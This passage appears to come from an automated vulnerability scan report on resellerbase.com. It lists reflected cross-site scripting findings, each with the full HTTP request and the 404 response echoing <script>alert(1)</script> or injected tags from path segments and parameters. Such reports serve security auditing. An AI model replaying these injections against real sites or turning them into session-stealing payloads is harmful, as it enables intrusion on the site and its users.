User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/rating662b8<script>alert(1)</script>d7b34cffffc/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1884. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 505cc<script>alert(1)</script>8d119cfe1af was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images/rating/search.php505cc<script>alert(1)</script>8d119cfe1af?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/rating/search.php505cc<script>alert(1)</script>8d119cfe1af?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1885. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 9766b<a>b38f203fbb was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/23/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search9766b<a>b38f203fbb&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search9766b<a>b38f203fbb&opt=2 was not found on this server.</p>
...[SNIP]...

2.1886. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 22141<a>a857a69c86a was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/23/themes/kosmos/images/rating/search.php?keyword=search...22141<a>a857a69c86a&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/rating/search.php?keyword=search...22141<a>a857a69c86a&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1887. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d83cb<script>alert(1)</script>1d15592a767 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&d83cb<script>alert(1)</script>1d15592a767=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&d83cb<script>alert(1)</script>1d15592a767=1 was not found on this server.</p>
...[SNIP]...

2.1888. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ec2de<a>f35ceab2961 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/23/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ec2de<a>f35ceab2961 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ec2de<a>f35ceab2961 was not found on this server.</p>
...[SNIP]...

2.1889. http://www.resellerbase.com/detail/23/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ee868<script>alert(1)</script>7469ac45a9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailee868<script>alert(1)</script>7469ac45a9d/23/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailee868<script>alert(1)</script>7469ac45a9d/23/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1890. http://www.resellerbase.com/detail/23/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cef0e<script>alert(1)</script>b97c40ef5f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23cef0e<script>alert(1)</script>b97c40ef5f8/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23cef0e<script>alert(1)</script>b97c40ef5f8/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1891. http://www.resellerbase.com/detail/23/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f4a21<script>alert(1)</script>ef8eb4102c3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themesf4a21<script>alert(1)</script>ef8eb4102c3/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themesf4a21<script>alert(1)</script>ef8eb4102c3/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1892. http://www.resellerbase.com/detail/23/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f45f1<script>alert(1)</script>dcea55209f9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmosf45f1<script>alert(1)</script>dcea55209f9/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmosf45f1<script>alert(1)</script>dcea55209f9/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1893. http://www.resellerbase.com/detail/23/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 734e4<script>alert(1)</script>87f5bcd7deb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images734e4<script>alert(1)</script>87f5bcd7deb/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images734e4<script>alert(1)</script>87f5bcd7deb/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1894. http://www.resellerbase.com/detail/23/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 7bcac<script>alert(1)</script>f7142e82ddf was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images/search.php7bcac<script>alert(1)</script>f7142e82ddf?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/search.php7bcac<script>alert(1)</script>f7142e82ddf?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1895. http://www.resellerbase.com/detail/23/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d03d7<a>32776ef9432 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/23/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchd03d7<a>32776ef9432&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchd03d7<a>32776ef9432&opt=2 was not found on this server.</p>
...[SNIP]...

2.1896. http://www.resellerbase.com/detail/23/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c020c<a>4cde2efea6a was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/23/themes/kosmos/images/search.php?keyword=search...c020c<a>4cde2efea6a&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/search.php?keyword=search...c020c<a>4cde2efea6a&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1897. http://www.resellerbase.com/detail/23/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 81d77<script>alert(1)</script>e6c34d0f0e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&81d77<script>alert(1)</script>e6c34d0f0e7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&81d77<script>alert(1)</script>e6c34d0f0e7=1 was not found on this server.</p>
...[SNIP]...

2.1898. http://www.resellerbase.com/detail/23/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7a80c<a>4da35a582eb was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/23/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=27a80c<a>4da35a582eb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=27a80c<a>4da35a582eb was not found on this server.</p>
...[SNIP]...

2.1899. http://www.resellerbase.com/detail/23/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload daf8a<script>alert(1)</script>add826db491 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaildaf8a<script>alert(1)</script>add826db491/23/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildaf8a<script>alert(1)</script>add826db491/23/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1900. http://www.resellerbase.com/detail/23/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f2427<script>alert(1)</script>cdde081f435 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23f2427<script>alert(1)</script>cdde081f435/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23f2427<script>alert(1)</script>cdde081f435/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

